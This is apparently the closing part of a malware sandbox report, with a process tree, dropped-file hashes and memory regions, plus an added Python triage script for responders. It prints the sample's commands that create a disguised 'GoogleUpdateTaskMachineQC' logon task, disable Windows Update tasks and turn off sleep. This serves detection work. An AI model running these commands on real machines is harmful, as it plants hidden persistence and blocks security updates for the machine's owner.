                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2652
                                                            • C:\Windows\System32\conhost.exe
                                                              C:\Windows\System32\conhost.exe
                                                              3⤵
                                                              • Drops file in Windows directory
                                                              PID:1936
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
                                                              3⤵
                                                                PID:2416
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
                                                                  4⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1444
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                3⤵
                                                                  PID:2516
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                    4⤵
                                                                      PID:2228
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"
                                                                1⤵
                                                                  PID:828
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"
                                                                  1⤵
                                                                    PID:1476
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"
                                                                    1⤵
                                                                      PID:2152
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2696
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2988
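
The command lines above are the artefacts a responder turns into checks: Windows Update maintenance tasks switched off with SCHTASKS /Change /DISABLE, sleep and hibernation timeouts zeroed with powercfg, a logon task registered under a GoogleUpdateTaskMachine* name whose action points at the dropped updater.exe listed under Downloads, and that task started immediately with schtasks /run. The script below is an added example and not part of the sandbox report: its input is constructed from the command lines, the N⤵ depth markers and the SHA-256 values on this page, and the (pid, depth, cmdline) record layout is an assumption made here. It also flags the argument-less conhost.exe spawned inside the tree (PID 1936) and the two dialersvc*.job files that no schtasks /create in the tree accounts for.

```python
"""Triage checks over the process tree and dropped-file list above.
Added example, not the sandbox's own logic: records are copied from the
report, and the (pid, depth, cmdline) layout is an assumption made here.
"""
import re

# Constructed from the process tree: (pid, depth, command line). The four
# powercfg children repeat the cmd.exe wrapper's chain, so only the wrapper is kept.
PROCESSES = [
    (2576, 4, r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE'),
    (1992, 4, r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE'),
    (2272, 4, r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE'),
    (2360, 4, r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE'),
    (740, 4, r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'),
    (2784, 3, r'"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0'),
    (1936, 3, r'C:\Windows\System32\conhost.exe'),
    (2416, 3, r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""'),
    (1444, 4, r'schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""'),
    (2228, 4, r'schtasks /run /tn "GoogleUpdateTaskMachineQC"'),
    (828, 1, r'\??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"'),
]

# Constructed from the Downloads section: dropped path -> SHA-256.
DROPPED_FILES = {
    r"C:\Users\Admin\Google\Chrome\updater.exe": "9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548",
    r"C:\Windows\Tasks\dialersvc32.job": "cc95c734ebe2cc9b775aaee6b540713449a4216f983c3fe8602d302ff9fbaf14",
    r"C:\Windows\Tasks\dialersvc64.job": "283e9b0adf894b1d36786ab59f9d82cd9f2682b55d8cf8be3a7f726c9e206028",
}

UPDATE_TASK_FOLDERS = ("\\microsoft\\windows\\windowsupdate\\",
                       "\\microsoft\\windows\\updateorchestrator\\")


def disabled_update_tasks(processes):
    """Windows Update tasks switched off with SCHTASKS /Change ... /DISABLE."""
    found = []
    for _pid, _depth, cmd in processes:
        m = re.search(r'schtasks\s+/change\s+/tn\s+"([^"]+)"\s+/disable', cmd, re.I)
        if m and m.group(1).lower().startswith(UPDATE_TASK_FOLDERS):
            found.append(m.group(1))
    return found


def zeroed_power_timeouts(processes):
    """powercfg /x settings forced to 0: never sleep or hibernate on AC or battery."""
    names = set()
    for _pid, _depth, cmd in processes:
        names.update(n.lower() for n in re.findall(r'powercfg\s+/x\s+-(\S+)\s+0\b', cmd, re.I))
    return sorted(names)


def created_tasks(processes):
    """Tasks registered with schtasks /create, de-duplicated by task name."""
    tasks = {}
    for _pid, _depth, cmd in processes:
        if not re.search(r'schtasks\s+/create\b', cmd, re.I):
            continue
        name = re.search(r'/tn\s+"([^"]+)"', cmd, re.I)
        target = re.search(r'/tr\s+(.+?)\s*$', cmd, re.I)
        if name and target:
            tasks.setdefault(name.group(1), {
                "name": name.group(1),
                "target": target.group(1).strip('"\\'),  # drop the escaped quoting around /tr
                "on_logon": bool(re.search(r'/sc\s+onlogon\b', cmd, re.I)),
                "highest": bool(re.search(r'/rl\s+highest\b', cmd, re.I)),
            })
    return list(tasks.values())


def suspicious_persistence(tasks):
    """Tasks named like the real GoogleUpdateTaskMachine* tasks but launched from a user profile."""
    return [t for t in tasks
            if t["name"].lower().startswith("googleupdatetaskmachine")
            and t["target"].lower().startswith("c:\\users\\")]


def bare_conhost(processes):
    """conhost.exe below the sample with no arguments. A genuine conhost is a depth-1
    child of csrss with a numeric argument, so this one is the injection host to dump."""
    return [pid for pid, depth, cmd in processes
            if depth > 1 and cmd.lower().rstrip().endswith("conhost.exe")]


def unexplained_job_files(dropped_files, tasks):
    """Task Scheduler 1.0 .job files in the Windows Tasks folder that no schtasks /create explains."""
    created = {t["name"].lower() for t in tasks}
    return [p for p in dropped_files
            if p.lower().startswith("c:\\windows\\tasks\\") and p.lower().endswith(".job")
            and p.lower().rsplit("\\", 1)[1][:-4] not in created]


def triage(processes, dropped_files):
    """Findings a responder would pivot on from this report."""
    tasks = created_tasks(processes)
    return {
        "disabled_update_tasks": disabled_update_tasks(processes),
        "zeroed_power_timeouts": zeroed_power_timeouts(processes),
        "persistence": suspicious_persistence(tasks),
        "persistence_hashes": {t["name"]: dropped_files.get(t["target"]) for t in tasks},
        "run_via_scheduler": any(re.search(r'schtasks\s+/run\b', c, re.I) for _p, _d, c in processes),
        "injection_host_pids": bare_conhost(processes),
        "unexplained_job_files": unexplained_job_files(dropped_files, tasks),
    }
```

On a live host the same findings are confirmed with `schtasks /query /tn GoogleUpdateTaskMachineQC /v /fo list` and `powercfg /q`. Because `schtasks /run` hands the launch to the Task Scheduler service, the payload does not appear as a child of the dropper, so the task action path and the hash of the file at that path, not process lineage, are the durable indicators to block on.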

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Downloads

• C:\Users\Admin\AppData\Local\Temp\CabA9A9.tmp
  Filesize  70KB
  MD5       49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1      1723be06719828dda65ad804298d0431f6aff976
  SHA256    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

• C:\Users\Admin\AppData\Local\Temp\TarA9EB.tmp
  Filesize  181KB
  MD5       4ea6026cf93ec6338144661bf1202cd1
  SHA1      a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize  7KB
  MD5       89705267bdaf059f6a554857043242c0
  SHA1      c2f26480d15e8d74b35f6426553e0be36b976cc7
  SHA256    332d9fd123e376d450cdef38b1eb5dfacaff32d3a506fe2e4f97462955e75f87
  SHA512    13b752dfe4fa4ba084c6846c8bbe44e09a96823af3883685e08e54769261098e69bc3e5de4a9d086c64584da86708804543ac60e1416e893738223526aac5a1f

• C:\Users\Admin\Google\Chrome\updater.exe
  Filesize  4.8MB
  MD5       40eeb7e6dc706f7e0eac78cc85213220
  SHA1      28b55166002c4ba1c9af0ec4fd9f98b591d6e498
  SHA256    9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
  SHA512    219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

• C:\Windows\Tasks\dialersvc32.job
  Filesize  1KB
  MD5       18e4b02054fe004820525aa2841425c3
  SHA1      9c06ad9478b70f38fa1ab94274d38e010c6bf64e
  SHA256    cc95c734ebe2cc9b775aaee6b540713449a4216f983c3fe8602d302ff9fbaf14
  SHA512    154bac0a405e3ad2cc65e9f7f3d40d9efe8ac5885f628c470490f4d08d419b575a376d75afe9c24e7f9bdf3946ba2eddec6fea7df04ff2a2b29397d846bed974

• C:\Windows\Tasks\dialersvc64.job
  Filesize  1KB
  MD5       dfcf07aa7810781da54d5e03f523af14
  SHA1      857afcee0e6156372b43ef87b7cf80b6d0923094
  SHA256    283e9b0adf894b1d36786ab59f9d82cd9f2682b55d8cf8be3a7f726c9e206028
  SHA512    db013679e607e39e2d2910eed4ebe53f19fffa60f9af86a510552e068ae97387bbff6345135a478c76cd897ac03689bf01a6a5034daaa45e24d2b1633c17b5c4

• memory/408-116-0x0000000037040000-0x0000000037050000-memory.dmp  Filesize 64KB
• memory/408-113-0x0000000000580000-0x00000000005A3000-memory.dmp  Filesize 140KB
• memory/408-114-0x00000000009A0000-0x00000000009CA000-memory.dmp  Filesize 168KB
• memory/408-115-0x000007FEBE470000-0x000007FEBE480000-memory.dmp  Filesize 64KB
• memory/408-111-0x0000000000580000-0x00000000005A3000-memory.dmp  Filesize 140KB
• memory/460-132-0x0000000000150000-0x000000000017A000-memory.dmp  Filesize 168KB
• memory/460-134-0x000007FEBE470000-0x000007FEBE480000-memory.dmp  Filesize 64KB
• memory/460-135-0x0000000037040000-0x0000000037050000-memory.dmp  Filesize 64KB
• memory/476-144-0x0000000000180000-0x00000000001AA000-memory.dmp  Filesize 168KB
• memory/476-146-0x000007FEBE470000-0x000007FEBE480000-memory.dmp  Filesize 64KB
• memory/952-101-0x000000001A030000-0x000000001A070000-memory.dmp  Filesize 256KB
• memory/952-102-0x0000000077000000-0x00000000771A9000-memory.dmp  Filesize 1.7MB
• memory/952-94-0x0000000019AB0000-0x0000000019D92000-memory.dmp  Filesize 2.9MB
• memory/952-95-0x0000000000FE0000-0x0000000000FE8000-memory.dmp  Filesize 32KB
• memory/952-103-0x0000000076DE0000-0x0000000076EFF000-memory.dmp  Filesize 1.1MB
• memory/1360-1-0x000000013F2D0000-0x000000013F79C000-memory.dmp  Filesize 4.8MB
• memory/1360-2-0x000000001BE20000-0x000000001C286000-memory.dmp  Filesize 4.4MB
• memory/1360-93-0x000007FEF5890000-0x000007FEF627C000-memory.dmp  Filesize 9.9MB
• memory/1360-3-0x000007FEF5890000-0x000007FEF627C000-memory.dmp  Filesize 9.9MB
• memory/1360-62-0x000000001AD40000-0x000000001AD46000-memory.dmp  Filesize 24KB
• memory/1360-0-0x000007FEF5893000-0x000007FEF5894000-memory.dmp  Filesize 4KB
• memory/1936-80-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-71-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-65-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-73-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-75-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-77-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-69-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-81-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-79-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp  Filesize 4KB
• memory/1936-68-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1936-63-0x0000000140000000-0x0000000140056000-memory.dmp  Filesize 344KB
• memory/1948-108-0x0000000140000000-0x0000000140042000-memory.dmp  Filesize 264KB
• memory/1948-104-0x0000000140000000-0x0000000140042000-memory.dmp  Filesize 264KB
• memory/1948-105-0x0000000140000000-0x0000000140042000-memory.dmp  Filesize 264KB
• memory/1948-107-0x0000000076DE0000-0x0000000076EFF000-memory.dmp  Filesize 1.1MB
• memory/1948-106-0x0000000077000000-0x00000000771A9000-memory.dmp  Filesize 1.7MB
• memory/2092-9-0x0000000001D80000-0x0000000001D88000-memory.dmp  Filesize 32KB
• memory/2092-8-0x000000001B490000-0x000000001B772000-memory.dmp  Filesize 2.9MB
• memory/2104-100-0x000000013F290000-0x000000013F75C000-memory.dmp  Filesize 4.8MB
• memory/2692-517-0x0000000000420000-0x0000000000434000-memory.dmp  Filesize 80KB
• memory/2692-518-0x0000000000540000-0x0000000000546000-memory.dmp  Filesize 24KB
• memory/2904-321-0x000000001B410000-0x000000001B6F2000-memory.dmp  Filesize 2.9MB
• memory/2904-322-0x0000000002000000-0x0000000002008000-memory.dmp  Filesize 32KB